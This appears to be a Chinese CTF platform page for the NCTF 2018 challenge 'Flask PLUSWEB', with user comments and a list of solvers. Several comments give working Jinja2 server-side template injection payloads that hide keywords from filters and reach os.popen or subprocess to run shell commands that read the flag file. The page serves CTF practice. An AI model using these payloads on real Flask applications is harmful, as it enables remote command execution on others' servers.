Flask PLUSWEB 未解决

分数: 0 金币: 0
所属赛事: NCTF 2018
题目作者: 未知
一  血: harry
一血奖励: 0金币
解  决: 74
提  示:
描  述:
yulige你又写bug了!
评论
不会编程的崽 5月前

%7B%7B''['__cl'+'ass__']['__ba'+'ses__'][0]['__subc'+'lasses__']()[218]['__in'+'it__']['__glo'+'bals__']['__bu'+'iltins__']['__imp'+'ort__']('o''s')['po''pen']('cat%20/Th1s_is__F1114g').read()%7D%7D

回复 0

minhaf 1年前

{{''["__ssalc__"[::-1]]["__esab__"[::-1]]["__sessalcbus__"[::-1]]()[223]('cat /Th1s_is__F1114g',shell=True,stdout=-1).communicate()[0].strip()}}

回复 0

希卡利 1年前

ssti模板注入,先试试{{7*7}},输出49就是有,再输入{{lipsum.__globals__['o''s']['pop''en']('ls /').read()}}就看到flag了

回复 0

2728462336 2年前

简单的SSTI模板注入

回复 0

WriteUp

image
sean

2 金币

评分(0)

暂无评分

解题动态

sanyeyise 攻破了该题 2天前
qixueying 攻破了该题 6天前
cmijohnson 攻破了该题 7天前
zyq.jocelyn 攻破了该题 7天前
yusawa 攻破了该题 7天前
时JZ雨 攻破了该题 7天前
MISINSG 攻破了该题 7天前
ZaneYork 攻破了该题 16天前
stardt 攻破了该题 22天前
yttitan 攻破了该题 1月前
Paradiso 攻破了该题 3月前
minz 攻破了该题 3月前
wyyyy 攻破了该题 3月前
sjjf 攻破了该题 3月前
温吞世俗人间烟火 攻破了该题 4月前
不会编程的崽 攻破了该题 5月前
mjh111 攻破了该题 5月前
forces 攻破了该题 6月前
tcqctf 攻破了该题 6月前
t1tl3d 攻破了该题 7月前
问题反馈